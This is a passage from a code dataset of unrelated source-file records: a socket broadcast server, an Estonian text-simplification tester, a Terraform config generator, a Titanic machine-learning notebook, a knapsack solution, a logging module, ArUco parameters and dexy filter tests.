messages = [\n '- {}'.format(\n '/'.join(map(operator.add, key_names, filter(None, key)))\n ) for key in errors.keys()\n ]\n return '\\n'.join(messages)\n","sub_path":"scourge/scourge.py","file_name":"scourge.py","file_ext":"py","file_size_in_byte":19413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
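construct_dependency_subgraph() in the record feeds nx.DiGraph edges pointing from dependency to dependent, and init() topologically sorts them into a build order; the same step in isolation (the package names here are just example data):

import networkx as nx

# Edges run from a dependency to the package that needs it, matching
# nx_graph.add_edge(edge, node) in the record.
deps = {"ibis": {"pandas"}, "pandas": {"numpy"}, "numpy": set()}

graph = nx.DiGraph()
for package, requirements in deps.items():
    graph.add_node(package)
    for requirement in requirements:
        graph.add_edge(requirement, package)

print(list(nx.topological_sort(graph)))  # e.g. ['numpy', 'pandas', 'ibis']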
+{"seq_id":"325662481","text":"#!/usr/bin/python3.5\n# coding: utf-8\n\nimport sys\nimport os\nimport socket\nimport select\nimport time\nimport json\nfrom collections import deque\nfrom daemon.apps.console.process import Cli\n\n\ndef stdout(msg):\n date = time.strftime(\"%F %T\")\n msg = \"%s %s\" % (date, msg)\n print(msg, end=\"\")\n\n\nclass Server:\n def __init__(self, listen):\n assert isinstance(listen, tuple), \"listen address must be a tuple!\"\n self._listen = listen\n self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # server端\n self._socket_admin = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # 客户端\n self._socket_admin.bind(('127.0.0.1', 4444))\n self._socket_admin.listen(1)\n self._socket.bind(self._listen)\n self._socket.listen(1)\n self._offline = [] # 离线anget\n self._online = [] # 在线agent\n self._clients = [] # 在线agent\n self._inputs = [self._socket, ]\n self._process = [self._socket_admin,]\n self._msgs = deque() # 消息队列\n\n def broadcast(self, msg, exclude=None): # 广播\n \"\"\"broadcast method\n 向所有连接到server的agent发送消息\n :param msg: str\n :param exclude: socket \n :return: None\n \"\"\"\n date = time.strftime(\"%F %T\")\n msg = \"%s %s\" % (date, msg)\n msg = msg.encode(\"utf-8\") # 将agent发送过来的数据解码 utf-8\n for client in self._inputs:\n if self._socket != client:\n if not exclude:\n client.sendall(bytes(msg))\n elif exclude and exclude != client:\n client.sendall(bytes(msg))\n\n def send(self, to, msg): # 向指定agent发送消息\n date = time.strftime(\"%F %T\")\n self._socket.sendto(bytes(date + \" \" + msg.encode(\"utf-8\")), addr=to)\n\n def run(self):\n while True:\n reader_list, write_list, except_list = select.select(self._inputs, [], [])\n for socket_obj in reader_list:\n if socket_obj is self._socket:\n client, address = socket_obj.accept()\n self._inputs.append(client)\n self._clients.append(client)\n broadcast_msg_server = \"client %s connected.\\n\" % (\":\".join(list(str(x) for x in iter(address))))\n broadcast_msg_client = \"welcome %s !!!\\n\" \\\n % (\":\".join(list(str(x) for x in iter(address))))\n print(broadcast_msg_server, end=\"\")\n self.broadcast(broadcast_msg_client)\n else:\n data = socket_obj.recv(1024)\n self._msgs.append(data.decode(\"utf-8\"))\n client_prop = \":\".join(list(str(x) for x in socket_obj.getpeername()))\n recv_msg = \"[ %s ] >>> %s\" % (client_prop, self._msgs.popleft())\n offline_msg = \"client %s disconnected.\\n\" % client_prop\n if data != b'': # agent断开连接\n stdout(recv_msg)\n self.broadcast(str(recv_msg), exclude=socket_obj)\n else:\n self._inputs.remove(socket_obj)\n self._clients.remove(socket_obj)\n stdout(offline_msg)\n self.broadcast(offline_msg, exclude=socket_obj)\n continue\n\n def process(self): # 管理工具,客户端\n while True:\n r, w, e = select.select(self._process, [], [])\n for i in r:\n if i is self._socket_admin:\n conn, address = self._socket_admin.accept()\n self._process.append(conn)\n else:\n data = i.recv(1024) # 接收数据\n if data != b'': # 判断数据是否为空\n data = data.decode(\"utf-8\") # 解码数据\n cli = Cli(self, self._socket_admin, data, self._clients) # 实例化Cli类型\n i.sendall(cli.run()) # 指令匹配\n print(data,cli.run())\n else:\n continue\n\n def stop(self):\n \"\"\"关闭套接子\n :return: \n \"\"\"\n self._socket.close()\n\n def restart(self):\n \"\"\"重新打开套接字\n :return: \n \"\"\"\n self.stop()\n self.run()\n\n @property\n def listen(self):\n \"\"\"监听地址\n :return: \n \"\"\"\n return self._listen\n\n @property\n def clients(self):\n \"\"\"agent\n :return: \n \"\"\"\n return self._clients\n\n @property\n def online(self):\n return 
self._online\n\n @property\n def offline(self):\n return self._online\n\n def __enter__(self):\n return self.run()\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self._socket.close()\n\n def __iter__(self):\n return iter(self._clients)\n\n\n\n","sub_path":"daemon/apps/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
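Server.run() above is a select()-based multiplexer with broadcast; the same accept/recv/close skeleton reduced to an echo loop (the port and buffer size are arbitrary here):

import select
import socket

server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(("127.0.0.1", 9999))
server.listen(5)
inputs = [server]

while True:
    readable, _, _ = select.select(inputs, [], [])
    for sock in readable:
        if sock is server:
            conn, _ = sock.accept()  # new client: start watching it
            inputs.append(conn)
        else:
            data = sock.recv(1024)
            if data:                 # echo back to the sender only
                sock.sendall(data)
            else:                    # empty read means the peer closed
                inputs.remove(sock)
                sock.close()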
+{"seq_id":"159847148","text":"#!/usr/local/bin/python\n# coding: utf-8\n\"\"\"\nKorpuse automaattestija, mis käib läbi kogu etteantud korpuse ning kogub lihtsustamistulemuste kohta statistikat\nAutor: Stiivo Siider\n\"\"\"\nimport estnltk\nimport re\nimport requests\nfrom estnltk import Text\nfrom estnltk import teicorpus\n\n\ndef testCorp():\n korpus = teicorpus.parse_tei_corpora(\"./tei_test\", suffix=\".tei\", target=[\"artikkel\", \"alaosa\", \"tervikteos\"])\n errorCounter = 0\n errorSents = []\n errors = []\n totalCounter = 0\n simplifiedCounter = 0\n verb1Counter = 0\n main1Counter = 0\n rootCounter = 0\n for artikkel in korpus:\n for sentence in artikkel.sentence_texts:\n try:\n r = requests.get('http://prog.keeleressursid.ee/ss_syntax/?l=' + sentence)\n tulemus = re.sub('.*?(.*?)
.*?', r'\\1', r.text, flags=re.DOTALL)\n info, lause = tulemus.strip().split(\"---- \")\n totalCounter += 1\n if \"__ÜKS TEGUSÕNA__\" in info:\n verb1Counter += 1\n elif \"__MITU JUURSÕNA__\" in info:\n rootCounter += 1\n elif \"__ÜKS PEASÕNA__\" in info:\n main1Counter += 1\n if \"__LIHTSUSTATUD__\" in info:\n simplifiedCounter += 1\n print(sentence)\n print(lause)\n print(\"-----------------------------\")\n\n except Exception as e:\n errorCounter += 1\n errorSents.append(sentence)\n errors.append(str(e))\n\n print(\"Total\", totalCounter)\n print(\"Simplified\", simplifiedCounter)\n print(\"Stopped 1 verb\", verb1Counter)\n print(\"Stopped 1 main\", main1Counter)\n print(\"Stopped 2+ root\", rootCounter)\n\n print(\"Errors\", errorCounter)\n for i, sent in enumerate(errorSents):\n print(\"Error sentence\", sent)\n print(\"Error message\", errors[i])\n print()\n\n\ntestCorp()\n","sub_path":"testija.py","file_name":"testija.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"196700674","text":"from gcpautoutil.executeTerraform import executedeployment\nfrom gcpautoutil.flagconstants import sheetdictmap, boolfields, strfields, deployment_execution_order, listfields\n\n\ndef writetoterraform(fieldvaldict, resource):\n \"\"\"\n Function to generate a .tfvars file for resources\n :param fieldvaldict: dictionary of values\n :param resource: resource getting deployed\n :return:\n \"\"\"\n with open('terraform/' + resource + '/terraform.tfvars', 'w+') as f:\n for i in fieldvaldict:\n if i in boolfields:\n strf = i + ' = ' + str(fieldvaldict[i]) + '\\n'\n elif i in strfields:\n strf = i + ' = ' + '\"' + str(fieldvaldict[i]).lower() + '\"\\n'\n elif i in listfields:\n strf = i + ' = ' + '[' + str(fieldvaldict[i]).lower() + ']\\n'\n else:\n strf = i + ' = ' + '\"' + str(fieldvaldict[i]) + '\"\\n'\n\n f.write(strf)\n f.flush()\n\n\ndef mapwithvalues(sheetname, fielddict):\n \"\"\"\n The function is to map with the values\n :param sheetname: sheetname from excel\n :param fielddict: dictionary of values\n :return: dictionary\n \"\"\"\n fieldvaldict = dict()\n for field in fielddict.keys():\n try:\n fieldvaldict[sheetdictmap[sheetname][str(field).strip()]] = fielddict[field]\n except KeyError as ke:\n continue\n return fieldvaldict\n\n\ndef mapwithterraform(vardict, sheetname):\n \"\"\"\n\n :param vardict:\n :param sheetname:\n :return:\n \"\"\"\n if sheetname == deployment_execution_order[2]:\n subdict = vardict['SUBNET']\n vpcdict = vardict[sheetname]\n\n # mapping for vpc\n fieldvaldict = mapwithvalues(sheetname, vpcdict)\n print('dict : ', fieldvaldict)\n\n writetoterraform(fieldvaldict, 'vpc')\n networkname = fieldvaldict['name']\n project = fieldvaldict['project']\n region = fieldvaldict['region']\n\n executedeployment('vpc')\n # mapping for subnet\n for subnum in subdict:\n fieldvaldict = mapwithvalues(sheetname, subdict[subnum])\n\n if 'network' not in fieldvaldict.keys():\n fieldvaldict['network'] = networkname\n fieldvaldict['project'] = project\n fieldvaldict['region'] = region\n writetoterraform(fieldvaldict, 'subnet')\n executedeployment('subnet')\n\n if sheetname == deployment_execution_order[1]:\n providerdict = vardict[sheetname]\n # mapping for provider\n fieldvaldict = mapwithvalues(sheetname, providerdict)\n print('dict : ', fieldvaldict)\n writetoterraform(fieldvaldict, 'provider')\n executedeployment('provider')\n\n if sheetname == deployment_execution_order[3]:\n instancedict = vardict[sheetname]\n # mapping for instance\n fieldvaldict = mapwithvalues(sheetname, instancedict)\n writetoterraform(fieldvaldict, 'instance')\n executedeployment('instance')\n\n if sheetname == deployment_execution_order[4]:\n firewalldict = vardict[sheetname]\n # mapping for firewall\n fieldvaldict = mapwithvalues(sheetname, firewalldict)\n writetoterraform(fieldvaldict, 'firewall')\n executedeployment('firewall')\n\n if sheetname == deployment_execution_order[5]:\n peerdict = vardict[sheetname]\n # mapping for peering\n fieldvaldict = mapwithvalues(sheetname, peerdict)\n resourcepath = r'projects/'+fieldvaldict['project']+'/global/networks/'\n network = fieldvaldict['network']\n peernet = fieldvaldict['peernetwork']\n projectid = fieldvaldict['project']\n newnet = resourcepath+network\n newpeernet = resourcepath + peernet\n fieldvaldict['network'] = newnet\n fieldvaldict['peernetwork'] = newpeernet\n writetoterraform(fieldvaldict, 'vpc-peering')\n executedeployment('vpc-peering')\n\n if sheetname == deployment_execution_order[6]:\n nodedict = vardict['NODE']\n 
clusterdict = vardict[sheetname]\n\n # mapping for vpc\n fieldvaldict = mapwithvalues(sheetname, clusterdict)\n\n writetoterraform(fieldvaldict, 'gke_cluster')\n clustername = fieldvaldict['name']\n\n executedeployment('gke_cluster')\n # mapping for subnet\n for subnum in nodedict:\n fieldvaldict = mapwithvalues(sheetname, nodedict[subnum])\n\n if 'cluster' not in fieldvaldict.keys():\n fieldvaldict['cluster'] = clustername\n writetoterraform(fieldvaldict, 'gke_node')\n executedeployment('gke_node')\n","sub_path":"gcpautoutil/mapwithterraform.py","file_name":"mapwithterraform.py","file_ext":"py","file_size_in_byte":4620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
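writetoterraform() above emits one key = value line per field, with quoting decided by boolfields/strfields/listfields membership; a pure-function sketch of the same rendering that returns the text instead of writing it (the field names in the example call are invented):

def render_tfvars(fieldvaldict, boolfields=(), strfields=(), listfields=()):
    # Same quoting rules as writetoterraform, collected instead of written.
    lines = []
    for key, value in fieldvaldict.items():
        if key in boolfields:
            lines.append('%s = %s' % (key, value))
        elif key in strfields:
            lines.append('%s = "%s"' % (key, str(value).lower()))
        elif key in listfields:
            lines.append('%s = [%s]' % (key, str(value).lower()))
        else:
            lines.append('%s = "%s"' % (key, value))
    return "\n".join(lines)

print(render_tfvars({"auto_create_subnetworks": False, "name": "VPC-1"},
                    boolfields=("auto_create_subnetworks",),
                    strfields=("name",)))
# auto_create_subnetworks = False
# name = "vpc-1"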
+{"seq_id":"492941721","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\n# Imports\n\n# pandas\nimport pandas as pd\nfrom pandas import Series,DataFrame\n\n# numpy, matplotlib, seaborn\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set_style('whitegrid')\nget_ipython().magic(u'matplotlib inline')\n\n# machine learning\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import SVC, LinearSVC\nfrom sklearn.ensemble import RandomForestClassifier,GradientBoostingClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.naive_bayes import GaussianNB\n\n\n# In[ ]:\n\n\n# get titanic & test csv files as a DataFrame\ntitanic_df = pd.read_csv(\"../input/train.csv\")\ntest_df = pd.read_csv(\"../input/test.csv\")\n\n\n# In[ ]:\n\n\n# preview the data\ntitanic_df.head()\n\n\n# In[ ]:\n\n\nprint(titanic_df.info())\nprint(\"----------------------------\")\nprint(test_df.info())\n\n\n# In[ ]:\n\n\n# drop unnecessary columns, these columns won't be useful in analysis and prediction\ntitanic_df = titanic_df.drop(['PassengerId','Name','Ticket'], axis=1)\ntest_df = test_df.drop(['Name','Ticket'], axis=1)\n\n\n# In[ ]:\n\n\n# Embarked\n\n# only in titanic_df, fill the two missing values with the most occurred value, which is \"S\".\ntitanic_df[\"Embarked\"] = titanic_df[\"Embarked\"].fillna(\"S\")\n\n# plot\nsns.factorplot('Embarked','Survived', data=titanic_df,size=4,aspect=3)\n\nfig, (axis1,axis2,axis3) = plt.subplots(1,3,figsize=(15,5))\n\nsns.countplot(x='Embarked', data=titanic_df, ax=axis1)\nsns.countplot(x='Survived', hue=\"Embarked\", data=titanic_df, order=[1,0], ax=axis2)\n\n# group by embarked, and get the mean for survived passengers for each value in Embarked\nembark_perc = titanic_df[[\"Embarked\", \"Survived\"]].groupby(['Embarked'],as_index=False).mean()\nsns.barplot(x='Embarked', y='Survived', data=embark_perc,order=['S','C','Q'],ax=axis3)\n\n# Either to consider Embarked column in predictions,\n# and remove \"S\" dummy variable, \n# and leave \"C\" & \"Q\", since they seem to have a good rate for Survival.\n\n# OR, don't create dummy variables for Embarked column, just drop it, \n# because logically, Embarked doesn't seem to be useful in prediction.\n\nembark_dummies_titanic = pd.get_dummies(titanic_df['Embarked'])\nembark_dummies_titanic.drop(['S'], axis=1, inplace=True)\n\nembark_dummies_test = pd.get_dummies(test_df['Embarked'])\nembark_dummies_test.drop(['S'], axis=1, inplace=True)\n\ntitanic_df = titanic_df.join(embark_dummies_titanic)\ntest_df = test_df.join(embark_dummies_test)\n\ntitanic_df.drop(['Embarked'], axis=1,inplace=True)\ntest_df.drop(['Embarked'], axis=1,inplace=True)\n\n\n# In[ ]:\n\n\n# Fare\n# only for test_df, since there is a missing \"Fare\" values\ntest_df[\"Fare\"].fillna(test_df[\"Fare\"].mean(), inplace=True)\n\n# convert from float to int\ntitanic_df['Fare'] = titanic_df['Fare'].astype(int)\ntest_df['Fare'] = test_df['Fare'].astype(int)\n\n# get fare for survived & didn't survive passengers \nfare_not_survived = titanic_df[\"Fare\"][titanic_df[\"Survived\"] == 0]\nfare_survived = titanic_df[\"Fare\"][titanic_df[\"Survived\"] == 1]\n\n# get average and std for fare of survived/not survived passengers\navgerage_fare = DataFrame([fare_not_survived.mean(), fare_survived.mean()])\nstd_fare = DataFrame([fare_not_survived.std(), fare_survived.std()])\n\n# plot\ntitanic_df['Fare'].plot(kind='hist', figsize=(15,3),bins=100, xlim=(0,50))\n\navgerage_fare.index.names = std_fare.index.names 
= [\"Survived\"]\navgerage_fare.plot(yerr=std_fare,kind='bar',legend=False)\n\n\n# In[ ]:\n\n\n# Cabin\n# It has a lot of NaN values, so it won't cause a remarkable impact on prediction in this simple model\ntitanic_df.drop(\"Cabin\",axis=1,inplace=True)\ntest_df.drop(\"Cabin\",axis=1,inplace=True)\n\n\n# In[ ]:\n\n\n# Age \n# get average, std, and number of NaN values in titanic_df\naverage_age_titanic = titanic_df[\"Age\"].mean()\nstd_age_titanic = titanic_df[\"Age\"].std()\ncount_nan_age_titanic = titanic_df[\"Age\"].isnull().sum()\n\n# get average, std, and number of NaN values in test_df\naverage_age_test = test_df[\"Age\"].mean()\nstd_age_test = test_df[\"Age\"].std()\ncount_nan_age_test = test_df[\"Age\"].isnull().sum()\n\n# generate random numbers between (mean - std) & (mean + std)\nrand_1 = np.random.randint(average_age_titanic - std_age_titanic, average_age_titanic + std_age_titanic, size = count_nan_age_titanic)\nrand_2 = np.random.randint(average_age_test - std_age_test, average_age_test + std_age_test, size = count_nan_age_test)\n\n# drop all null values, and convert to int\ntitanic_df['Age'].dropna().astype(int)\n# test_df['Age'].dropna().astype(int).hist(bins=70, ax=axis1)\n\n# fill NaN values in Age column with random values generated\ntitanic_df[\"Age\"][np.isnan(titanic_df[\"Age\"])] = rand_1\ntest_df[\"Age\"][np.isnan(test_df[\"Age\"])] = rand_2\n\n# convert from float to int\ntitanic_df['Age'] = titanic_df['Age'].astype(int)\ntest_df['Age'] = test_df['Age'].astype(int)\n\n\n# In[ ]:\n\n\n# Sex\n\n# As we see, children(age < ~16) on aboard seem to have a high chances for Survival.\n# So, we can classify passengers as males, females, and child\ndef get_person(passenger):\n age,sex = passenger\n return 'child' if age < 16 else sex\n \ntitanic_df['Person'] = titanic_df[['Age','Sex']].apply(get_person,axis=1)\ntest_df['Person'] = test_df[['Age','Sex']].apply(get_person,axis=1)\n\n# No need to use Sex column since we created Person column\ntitanic_df.drop(['Sex'],axis=1,inplace=True)\ntest_df.drop(['Sex'],axis=1,inplace=True)\n\n# create dummy variables for Person column, & drop Male as it has the lowest average of survived passengers\nperson_dummies_titanic = pd.get_dummies(titanic_df['Person'])\nperson_dummies_titanic.columns = ['Child','Female','Male']\nperson_dummies_titanic.drop(['Male'], axis=1, inplace=True)\n\nperson_dummies_test = pd.get_dummies(test_df['Person'])\nperson_dummies_test.columns = ['Child','Female','Male']\nperson_dummies_test.drop(['Male'], axis=1, inplace=True)\n\ntitanic_df = titanic_df.join(person_dummies_titanic)\ntest_df = test_df.join(person_dummies_test)\n\nfig, (axis1,axis2) = plt.subplots(1,2,figsize=(10,5))\n\nsns.factorplot('Person',data=titanic_df,kind='count',ax=axis1)\n#sns.countplot(x='Person', data=titanic_df, ax=axis1)\n\n# average of survived for each Person(male, female, or child)\nperson_perc = titanic_df[[\"Person\", \"Survived\"]].groupby(['Person'],as_index=False).mean()\nsns.barplot(x='Person', y='Survived', data=person_perc, ax=axis2, order=['male','female','child'])\n\ntitanic_df.drop(['Person'],axis=1,inplace=True)\ntest_df.drop(['Person'],axis=1,inplace=True)\n\n\n# In[ ]:\n\n\n# define training and testing sets\n\nX_train = titanic_df.drop(\"Survived\",axis=1)\nY_train = titanic_df[\"Survived\"]\nX_test = test_df.drop(\"PassengerId\",axis=1).copy()\n\n\n# In[ ]:\n\n\n# Logistic Regression\n\nlogreg = LogisticRegression()\n\nlogreg.fit(X_train, Y_train)\n\nY_pred = logreg.predict(X_test)\n\nlogreg.score(X_train, 
Y_train)\n\n\n# In[ ]:\n\n\n#Support Vector Machines\n\nsvc = SVC()\n\nsvc.fit(X_train, Y_train)\n\nY_pred = svc.predict(X_test)\n\nsvc.score(X_train, Y_train)\n\n\n# In[ ]:\n\n\n# Random Forests\n\nrandom_forest = RandomForestClassifier(n_estimators=100,oob_score=True,max_features=5)\n\nrandom_forest.fit(X_train, Y_train)\n\nY_pred = random_forest.predict(X_test)\n\nrandom_forest.score(X_train, Y_train)\n\n\n# In[ ]:\n\n\nrandom_forest.get_params,random_forest.feature_importances_\n\n\n# In[ ]:\n\n\n# Gradient Boosts\ngrad_boost = GradientBoostingClassifier(n_estimators=1000)\ngrad_boost.fit(X_train, Y_train)\nY_pred = grad_boost.predict(X_test)\ngrad_boost.score(X_train, Y_train)\n\n\n# In[ ]:\n\n\n# get Correlation Coefficient for each feature using Logistic Regression\ncoeff_df = DataFrame(titanic_df.columns.delete(0))\ncoeff_df.columns = ['Features']\ncoeff_df[\"Coefficient Estimate\"] = pd.Series(logreg.coef_[0])\n\n# preview\ncoeff_df\n\n\n# In[ ]:\n\n\nsubmission = pd.DataFrame({\n \"PassengerId\": test_df[\"PassengerId\"],\n \"Survived\": Y_pred\n })\nsubmission.to_csv('titanic.csv', index=False)\n\n","sub_path":"Notebooks/py/adityaecdrid/random-forest-classifier-for-a-starter/random-forest-classifier-for-a-starter.py","file_name":"random-forest-classifier-for-a-starter.py","file_ext":"py","file_size_in_byte":7890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
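A note on the dummy-variable pattern used in the record above (one-hot encode, then drop one redundant column): pandas can do the drop in the same call. A minimal sketch; note that drop_first removes the alphabetically first category ('C' here), whereas the notebook deliberately drops 'S':

import pandas as pd

df = pd.DataFrame({'Embarked': ['S', 'C', 'Q', 'S']})
# One-hot encode and drop one redundant level in a single call;
# the remaining columns still determine the category uniquely.
dummies = pd.get_dummies(df['Embarked'], drop_first=True)
print(dummies.columns.tolist())  # ['Q', 'S']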
+{"seq_id":"236401630","text":"# In this programming problem and the next you'll code up the knapsack algorithm from lecture.\n#\n# Let's start with a warm-up. Download the text file below.\n#\n# knapsack1.txt\n# This file describes a knapsack instance, and it has the following format:\n#\n# [knapsack_size][number_of_items]\n#\n# [value_1] [weight_1]\n#\n# [value_2] [weight_2]\n#\n# ...\n#\n# For example, the third line of the file is \"50074 659\", indicating that the second item has value 50074 and size 659, respectively.\n#\n# You can assume that all numbers are positive. You should assume that item weights and the knapsack capacity are integers.\n#\n# In the box below, type in the value of the optimal solution.\n\nimport numpy as np\n\nfile = open(\"knapsack1.txt\", \"r\")\ni = 0\nitemDict = {}\nfor line in file:\n    split = line.split()\n    if i == 0:\n        knapsack_size = int(split[0])\n        number_of_items = int(split[1])\n\n    else:\n        itemDict[i] = {}\n        itemDict[i][\"value\"] = int(split[0])\n        itemDict[i][\"weight\"] = int(split[1])\n    i += 1\n\nA = np.zeros(shape=(number_of_items + 1, knapsack_size + 1), dtype=np.int32)\n\nfor i in range(1, number_of_items + 1):\n    for x in range(1, knapsack_size + 1):\n        if x - itemDict[i][\"weight\"] >= 0:  # >= so an item that exactly fills the remaining capacity still counts\n            A[i, x] = max(A[i - 1, x], A[i - 1, x - itemDict[i][\"weight\"]] + itemDict[i][\"value\"])\n        else:\n            A[i, x] = A[i - 1, x]\n\nprint(A[number_of_items, knapsack_size])\n\n","sub_path":"Stanford/Algorithms/Course 3 - Greedy Algorithms, Minimum Spanning Trees, and Dynamic Programming/assignments/4/knapsack1.py","file_name":"knapsack1.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
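The recurrence implemented above is A[i, x] = max(A[i-1, x], A[i-1, x - w_i] + v_i) whenever item i fits. A tiny hand-checkable instance (two made-up items, capacity 4) shows why the fit test must be >= 0: item 1 exactly fills the knapsack, and a strict > would miss it:

import numpy as np

items = {1: {"value": 3, "weight": 4}, 2: {"value": 2, "weight": 3}}
n, capacity = 2, 4
A = np.zeros((n + 1, capacity + 1), dtype=np.int32)
for i in range(1, n + 1):
    for x in range(1, capacity + 1):
        if x - items[i]["weight"] >= 0:  # item i fits in the remaining capacity x
            A[i, x] = max(A[i - 1, x], A[i - 1, x - items[i]["weight"]] + items[i]["value"])
        else:
            A[i, x] = A[i - 1, x]
print(A[n, capacity])  # 3: take item 1 alone; with a strict '>' the exact fit is skipped and 2 is printed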
+{"seq_id":"73562084","text":"\"\"\"This module implements event logging.\n\nEvent logging is implemented via *@log_event* and *@log_exception* decorators.\n\nLogging level is configured via *loglevel* parameter in configuration file, which may take one of the following values:\n\n* INFO\n* ERROR\n* DEBUG\n\nDefault loglevel is **ERROR**. With this loglevel, exceptions are logged with request URL and response code, no sensitive\ninformation is logged. \n\nA path and file name of the logfile is defined by *logfile* parameter in configuration file which takes full absolute\npath and filename to configuration file. Default logfile location is **pyvdp.log** in the same directory, where \nconfiguration file is located.\n\n**Usage:**\n\n .. code-block:: python\n \n from pyvdp import logger\n \n @logger.log_event\n def foo(bar):\n return baz\n \n @logger.log_exception\n def xyz(abc):\n return True\n\"\"\"\nimport functools\nimport logging\nimport uuid\n\nfrom pyvdp import configuration\n\nconfig = configuration.get_config()\n\n\ndef get_logger():\n \"\"\"Creates an instance of logger.\n \n :return: logger \n \"\"\"\n logger = logging.getLogger('pyvdp')\n loglevel = logging.getLevelName(config['loglevel'])\n logger.setLevel(loglevel)\n formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\n\n if not logger.handlers:\n fh = logging.FileHandler(config['logfile'])\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n\n return logger\n\n\ndef log_event(func):\n \"\"\"Decorator function to log events.\"\"\"\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n logger = get_logger()\n\n result = func(*args, **kwargs)\n\n _uuid = uuid.uuid4()\n\n logger.info(\"[%s] Request: %s %s\" % (_uuid, result['request']['method'], result['request']['url']))\n logger.debug(\"[%s] Request HTTP headers: %s\" % (_uuid, result['request']['headers']))\n logger.debug(\"[%s] Request payload: %s\" % (_uuid, result['request']['body']))\n\n logger.info(\"[%s] Response: HTTP %s\" % (_uuid, result['response']['code']))\n logger.debug(\"[%s] Response HTTP headers: %s\" % (_uuid, result['response']['headers']))\n logger.debug(\"[%s] Response message: %s\" % (_uuid, result['response']['message']))\n\n return result\n\n return wrapper\n\n\ndef log_exception(func):\n \"\"\"Decorator function to log exceptions.\"\"\"\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n logger = get_logger()\n\n result = kwargs['result']\n\n _uuid = uuid.uuid4()\n\n logger.error(\"[%s] Request: %s %s\" % (_uuid, result['request']['method'], result['request']['url']))\n logger.debug(\"[%s] Request headers: %s\" % (_uuid, result['request']['headers']))\n logger.debug(\"[%s] Request payload: %s\" % (_uuid, result['request']['body']))\n\n logger.error(\"[%s] Response: HTTP %s\" % (_uuid, result['response']['code']))\n logger.debug(\"[%s] Response headers: %s\" % (_uuid, result['response']['headers']))\n logger.debug(\"[%s] Response message: %s\" % (_uuid, result['response']['message']))\n\n func(*args, **kwargs)\n\n return wrapper\n","sub_path":"pyvdp/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":3171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
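Both decorators above assume a particular shape for the wrapped call: log_event reads a dict with 'request' and 'response' keys from the return value, and log_exception expects the same dict passed in as a result= keyword argument. A minimal sketch of a conforming function; the URL and payload are placeholders, not a real endpoint:

from pyvdp import logger

@logger.log_event
def send_request():
    # Must return this structure, since the decorator logs from it.
    return {
        'request': {'method': 'POST', 'url': 'https://example.com/api', 'headers': {}, 'body': '{}'},
        'response': {'code': 200, 'headers': {}, 'message': 'OK'},
    }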
+{"seq_id":"552732391","text":"import numpy as np\n\nmarkerLength = 0.012\n\nmarkerLength_tracker = 0.14 / 10 / 11 * 10\nmarkerSeparation_tracker = 0.14 / 10 / 11\n\ntracker_id_left = 45\ntracker_id_right = 40\noffset_left = -5 * 1.25\noffset_right = 5 * 1.25\n\ntracker_offset_y = 1.1 / 100\ntracker_offset_x = 7.4 / 100\n\nNULL_POINT = [np.nan, np.nan, np.nan]\n\nCOLOR_CORNER = [[0, 0, 0, 0.75]]\nCOLOR_TRACKER = [[0, 1, 0, 0.75]]\nCOLOR_CAMERA = [[0, 0, 0, 0.25]]\n","sub_path":"Aruco/Analyze/parameters.py","file_name":"parameters.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"414019632","text":"from dexy.common import OrderedDict\nfrom dexy.doc import Doc\nfrom dexy.tests.utils import assert_output\nfrom dexy.tests.utils import wrap\n\ndef test_pyg4rst():\n    o = OrderedDict()\n    o['1'] = \".. code:: python\\n    print 'hello'\"\n    assert_output(\"pyg4rst\", \"print 'hello'\", o, ext=\".py\")\n\ndef test_html():\n    with wrap() as wrapper:\n        doc = Doc(\"example.py|pyg|h\",\n                contents=\"print 'hello'\\n\",\n                wrapper=wrapper)\n        wrapper.docs = [doc]\n        wrapper.run()\n\n        assert \"\"\"<div class=\"highlight\">\"\"\" in doc.output().as_text()\n\ndef test_png():\n    with wrap() as wrapper:\n        doc = Doc(\"example.py|pyg|pn\",\n                contents=\"print 'hello'\\n\",\n                wrapper=wrapper)\n        wrapper.docs = [doc]\n        wrapper.run()\n\ndef test_jpg():\n    with wrap() as wrapper:\n        doc = Doc(\"example.py|pyg|jn\",\n                contents=\"print 'hello'\\n\",\n                wrapper=wrapper)\n        wrapper.docs = [doc]\n        wrapper.run()\n\ndef test_gif():\n    with wrap() as wrapper:\n        doc = Doc(\"example.py|pyg|gn\",\n                contents=\"print 'hello'\\n\",\n                wrapper=wrapper)\n        wrapper.docs = [doc]\n        wrapper.run()\n","sub_path":"dexy/tests/plugins/test_pygments_filters.py","file_name":"test_pygments_filters.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
